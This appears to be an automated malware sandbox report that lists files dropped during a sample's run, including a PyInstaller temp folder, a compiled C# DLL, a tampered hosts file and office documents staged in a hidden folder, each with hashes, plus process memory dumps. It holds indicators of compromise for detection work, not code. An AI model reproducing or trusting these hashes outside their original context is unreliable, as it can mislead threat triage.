46cd75111d2654910f776052cc30b5e1fceb5aee

SHA256
a9dd0275131105df5611f31a9e6fbf27fd77d0a35d1a73a9f4941235fbc68bd7

SHA512
b2ee469ea5a6f49bbdd553363baa8ebad2baf13a658d0d0c167fde7b82eb77a417d519420db64f325d0224f133e3c5267df3aa56c11891d740d6742adf84dbe4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI22682\unicodedata.pyd

Filesize
293KB

MD5
bb3fca6f17c9510b6fb42101fe802e3c

SHA1
cb576f3dbb95dc5420d740fd6d7109ef2da8a99d

SHA256
5e2f1bbfe3743a81b00717011094798929a764f64037bedb7ea3d2ed6548eb87

SHA512
05171c867a5d373d4f6420136b6ac29fa846a85b30085f9d7fabcbb4d902afee00716dd52010ed90e97c18e6cb4e915f13f31a15b2d8507e3a6cfa80e513b6a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4fnq00ys.a5s.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\dbaiunwj\dbaiunwj.dll

Filesize
4KB

MD5
42d2be54bc9edf47d50a0d72470962fe

SHA1
cf84b0973c4b4c2b01ad9207ce0a4e3e952031f5

SHA256
bf8a87c6754cbbebdcc602a0eadf05e842187bdc79c501fe71468e603aad89c9

SHA512
ebeb70a8b874cccd826b4b3aa79dfefaf41acf511ec7cb70ec6cfba5d24f62587fc92e3b5345c494cf734c7e4eaf0b3885bdb953421b0309d37068d4de538e9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ \Common Files\Desktop\ApproveJoin.xlsx

Filesize
9KB

MD5
2beef40f1273992f2e197c54c8ee2ff7

SHA1
27c5192cc3d2174bc394d048c557cbf4dec20dd3

SHA256
4519e4d92136520e33cd1f9a2814cf892e16fd77f6370e8877c5f332e1f1e46c

SHA512
d1865d61685fc17277f610486675385c6fedb6f46e896dcecc12b20cf2074294484c48e5393780634555ce7b984638dd4ccc3a4958a2a0c4f7a6621b153380a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ \Common Files\Desktop\ConvertBlock.xlsx

Filesize
14KB

MD5
240aac4c49879d2409f1afca02845385

SHA1
61d18a050edc96466774f5b998e6ae20e2702bdb

SHA256
996ace7de3d114e03baeec1eb9a3ec6b033aa05f42f35fd92452cbb20552ef96

SHA512
44e9d936c0f4fb75bbc3963590f14a366b5ff5250ce31d5a256d7b4c9c9eda68f3b45fc4876d01946016093018119938ca5e6d8535c61b6d1e17c01702618825

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ \Common Files\Desktop\MeasureCheckpoint.docx

Filesize
16KB

MD5
80a023e705d1df7f29a5695b10a37f54

SHA1
43eab1170627832ba0f83700ac415941c3a820cb

SHA256
2711ddd74cb01386b791b539ff80c34adc6432fefa6a990f5192178c4b7ae804

SHA512
261b45a7d86061a6a6933c25365e30ff3446800479da4f227fa4c3662cfe230ef0878209584fba1e2c6492db9e5303b9770be40786851de7f9e86e94ec5bf9c7

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ \Common Files\Desktop\RevokeMerge.xlsx

Filesize
10KB

MD5
d377df5a81f4d5f55f03df1c65b9efb6

SHA1
cab1977a2ef00de06295d46fe1d57d1a8b9d4f79

SHA256
bb2c72a6e8a13904aebfb05d45b59357941720a6a901b0e967962ef6cdb9c9d4

SHA512
2a48fcadc0e4efba3bb2880a7e540b5154cce0b5d3212b35d1691bd9f80b35cfe27646766cf61c66f27893ceb6cd9e14a4cec4dc9c5ae7a7e8d2bd508254ef6a

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ \Common Files\Desktop\SwitchSave.docx

Filesize
19KB

MD5
8c9ca9cf007d98b0094907cf5024dd31

SHA1
a1b7bfa361578a762d307ba82578105d34871a05

SHA256
d3d9d7ee90b58e1d54a886cae9e63b7275a951c014082a8ff99cb9af29290164

SHA512
46a4ee8e96c036256392827851d3ce313157534e7a9b76a0058ce1328dda13ce64b67299560cb0996a7f8afb6e1a44e148abe053f7c0f677c5781ed378e7f7af

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ \Common Files\Documents\BackupConnect.xlsx

Filesize
917KB

MD5
608f689c0520e3d48d42346e008e51b8

SHA1
440ac8df0b399aaea2909e0ca071857e1afd110d

SHA256
b927a43a0f66a5aa662b207be888228fbb788bc16ae972128bff073b7b872275

SHA512
7ff0f10e4c47e6df40b7e95330c87e1a5aef35bba98b229e5d8aa3741ae9544f46a08e67c8e59666d0d312fc887b792a189c84ff7676b0377679732b2229b698

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ \Common Files\Documents\ConvertBackup.vst

Filesize
511KB

MD5
8bb1c31f277305929f73f0d763d4a365

SHA1
b67c19a38213ccda088e14fbc802debc8e00c13a

SHA256
b98ac5b725e5c7684930aafaab16463cfa7a8bc0c39d5fa24db2d72e470af2bd

SHA512
7efef75a39217e49c935e061138a92d7cfb3c0175014bb89dca64995e063689da9b8e6458df750a71067cd8c727aeba9b6f8509f39a81ba5bf72e9de92563422

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ \Common Files\Documents\ImportSplit.docx

Filesize
1.5MB

MD5
71faec2f038e72b86db7690dabcfb036

SHA1
64c6124734f7d02b4f9467c1477d3d14a87e92b9

SHA256
02ba56c5f7220ada91ed876fa76b8790e2fb032e6cdcfcdbc5cac8f821433c0a

SHA512
35aeeeb8409515ab1a673867ed9bab91113c9384ab9c237651e19a9fe73d016f387e6446ab619abc8ce68fc193696affeb2145b1e1dca51ce7306ad06401c640

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ \Common Files\Documents\InstallBackup.pps

Filesize
895KB

MD5
9336ebf69f47daf86555076a8db1d830

SHA1
ec67437f0455b0626f63cfec9d1bb8a53d71b802

SHA256
4755d086d83cb07f2e4fbe9f8a8604c9f0189500f9c521e7d858a9f94729e2c0

SHA512
e7a1f863d67e9e39aa817f6cf921ff773a75d185f1bf2dfedad8a6de8414b7c4fbd34a082474f887fbe21bf041465697b825ad452589e3b66608177ee85fc1a3

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ \Common Files\Documents\OpenSplit.docx

Filesize
447KB

MD5
5414f6d6b8c447a386d772b8437e0bfd

SHA1
75c71ea7d866a58fed64efae1cd52f99698d77b1

SHA256
fbc76ee736c53bc7e76cc9e85055d5f3b45eaaf3ab2b8b63a17cdf4aad025212

SHA512
7b13a53170ab1d7ccfea434347be60acb84d59710f4042e2f959914681b3746e32d5a9fc1df9706c5d4058ed0d90af78fe1f302e3216c134d4f68f2ddd57b2dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ \Common Files\Documents\ProtectImport.xlsx

Filesize
10KB

MD5
a067152b7a744f663b6e3fbdb729bf96

SHA1
a28cf0978c67b7b277cfaab8dd827faa0a2f7a14

SHA256
96d2fbbd45e7ed93694e4d6aeb21b00e424de11154b46319ec002f484919b585

SHA512
c75918acfb0e844ed06d83e5dd6e549b3d5bb38615542ca24ba167596aaaf2926d8978d6459962f1bbd301e4381135efaa59672ef0e4efdf3b9045279c3e21ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ \Common Files\Documents\ResizeUninstall.xlsx

Filesize
12KB

MD5
c8467d1da25deb606d103af29d94760f

SHA1
8b26937def6aee041aa3099b9e147137c44b934c

SHA256
cebca90325d7e7caec0fbc1801c1cc9467fda5dd2c90e5c3d08e41ee6f89e27e

SHA512
9fa471045861c0a1617f2334e2d2c3861778e47f88fdab88cbbefd0e31a33dbc2fee6102d761f90654b405b9dbcfce08a6d50d549cb2f77a729d81a7cc1ea795

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\dbaiunwj\CSCBBCB77E8EE2D4851984B21CC65F54BB.TMP

Filesize
652B

MD5
4ab25ed46d0900ff56613ff22ffce48d

SHA1
8471c0a8a59e09e06f9ab3ce6cd57d63810e4d35

SHA256
8f1b3f1b5b4dc6a3c8cc6c6094de0b21d20ca3c9d69d9d6eda02e4e44849ed35

SHA512
4e7daaece1c733744c25cde88d96134d0fbd5cc2c2f9269011b6fdeb89c282b6a46d3ef3827aa29fc9b37050a7b2506006bf8aed39dfcdedbdbe40c73b9a0235

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\dbaiunwj\dbaiunwj.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\dbaiunwj\dbaiunwj.cmdline

Filesize
607B

MD5
066d4eddf01f8ef74836039985ebd7aa

SHA1
f2c95e2568b3c201b1830ca9e6264bdf94aeac60

SHA256
6118c1fee92c2ee7e16d9c69f1f11b1d5d7b572363f4d091157eb698874b5092

SHA512
148698ef96041b5a24a32e97caa5aa451a1f9fc68690813ed3ac89eccb0c9af4fcd98cfa2b6d68896aabecce82dd0d68abd617a2a17d8acb635f19fed4de3904

Download Submit
memory/396-30-0x00007FFF89770000-0x00007FFF89794000-memory.dmp

Filesize
144KB

Download
memory/396-60-0x00007FFF849E0000-0x00007FFF84B53000-memory.dmp

Filesize
1.4MB

Download
memory/396-329-0x00007FFF8B630000-0x00007FFF8B649000-memory.dmp

Filesize
100KB

Download
memory/396-80-0x00007FFF85510000-0x00007FFF85533000-memory.dmp

Filesize
140KB

Download
memory/396-81-0x00007FFF849E0000-0x00007FFF84B53000-memory.dmp

Filesize
1.4MB

Download
memory/396-82-0x00007FFF7E550000-0x00007FFF7E66C000-memory.dmp

Filesize
1.1MB

Download
memory/396-78-0x00007FFF8A0A0000-0x00007FFF8A0AD000-memory.dmp

Filesize
52KB

Download
memory/396-330-0x00007FFF85510000-0x00007FFF85533000-memory.dmp

Filesize
140KB

Download
memory/396-48-0x00007FFF8DFF0000-0x00007FFF8DFFF000-memory.dmp

Filesize
60KB

Download
memory/396-76-0x00007FFF81610000-0x00007FFF81624000-memory.dmp

Filesize
80KB

Download
memory/396-214-0x00007FFF830A0000-0x00007FFF830CE000-memory.dmp

Filesize
184KB

Download
memory/396-25-0x00007FFF75EB0000-0x00007FFF76498000-memory.dmp

Filesize
5.9MB

Download
memory/396-271-0x00007FFF80680000-0x00007FFF80738000-memory.dmp

Filesize
736KB

Download
memory/396-273-0x00007FFF75B30000-0x00007FFF75EA5000-memory.dmp

Filesize
3.5MB

Download
memory/396-274-0x000001DEB5D90000-0x000001DEB6105000-memory.dmp

Filesize
3.5MB

Download
memory/396-73-0x00007FFF75B30000-0x00007FFF75EA5000-memory.dmp

Filesize
3.5MB

Download
memory/396-74-0x000001DEB5D90000-0x000001DEB6105000-memory.dmp

Filesize
3.5MB

Download
memory/396-72-0x00007FFF89770000-0x00007FFF89794000-memory.dmp

Filesize
144KB

Download
memory/396-69-0x00007FFF80680000-0x00007FFF80738000-memory.dmp

Filesize
736KB

Download
memory/396-68-0x00007FFF75EB0000-0x00007FFF76498000-memory.dmp

Filesize
5.9MB

Download
memory/396-66-0x00007FFF830A0000-0x00007FFF830CE000-memory.dmp

Filesize
184KB

Download
memory/396-64-0x00007FFF8B7C0000-0x00007FFF8B7CD000-memory.dmp

Filesize
52KB

Download
memory/396-63-0x00007FFF850A0000-0x00007FFF850B9000-memory.dmp

Filesize
100KB

Download
memory/396-109-0x00007FFF850A0000-0x00007FFF850B9000-memory.dmp

Filesize
100KB

Download
memory/396-58-0x00007FFF85510000-0x00007FFF85533000-memory.dmp

Filesize
140KB

Download
memory/396-56-0x00007FFF8B630000-0x00007FFF8B649000-memory.dmp

Filesize
100KB

Download
memory/396-54-0x00007FFF85540000-0x00007FFF8556D000-memory.dmp

Filesize
180KB

Download
memory/396-289-0x00007FFF75EB0000-0x00007FFF76498000-memory.dmp

Filesize
5.9MB

Download
memory/396-295-0x00007FFF849E0000-0x00007FFF84B53000-memory.dmp

Filesize
1.4MB

Download
memory/396-290-0x00007FFF89770000-0x00007FFF89794000-memory.dmp

Filesize
144KB

Download
memory/396-332-0x00007FFF850A0000-0x00007FFF850B9000-memory.dmp

Filesize
100KB

Download
memory/396-339-0x00007FFF7E550000-0x00007FFF7E66C000-memory.dmp

Filesize
1.1MB

Download
memory/396-336-0x00007FFF75B30000-0x00007FFF75EA5000-memory.dmp

Filesize
3.5MB

Download
memory/396-338-0x00007FFF8A0A0000-0x00007FFF8A0AD000-memory.dmp

Filesize
52KB

Download
memory/396-337-0x00007FFF81610000-0x00007FFF81624000-memory.dmp

Filesize
80KB

Download
memory/396-335-0x00007FFF80680000-0x00007FFF80738000-memory.dmp

Filesize
736KB

Download
memory/396-334-0x00007FFF830A0000-0x00007FFF830CE000-memory.dmp

Filesize
184KB

Download
memory/396-333-0x00007FFF8B7C0000-0x00007FFF8B7CD000-memory.dmp

Filesize
52KB

Download
memory/396-328-0x00007FFF85540000-0x00007FFF8556D000-memory.dmp

Filesize
180KB

Download
memory/396-342-0x00007FFF8DFF0000-0x00007FFF8DFFF000-memory.dmp

Filesize
60KB

Download
memory/396-341-0x00007FFF89770000-0x00007FFF89794000-memory.dmp

Filesize
144KB

Download
memory/396-340-0x00007FFF75EB0000-0x00007FFF76498000-memory.dmp

Filesize
5.9MB

Download
memory/396-331-0x00007FFF849E0000-0x00007FFF84B53000-memory.dmp

Filesize
1.4MB

Download
memory/540-92-0x00000150E7640000-0x00000150E7662000-memory.dmp

Filesize
136KB

Download
memory/4920-207-0x000001C24D790000-0x000001C24D798000-memory.dmp

Filesize
32KB

Download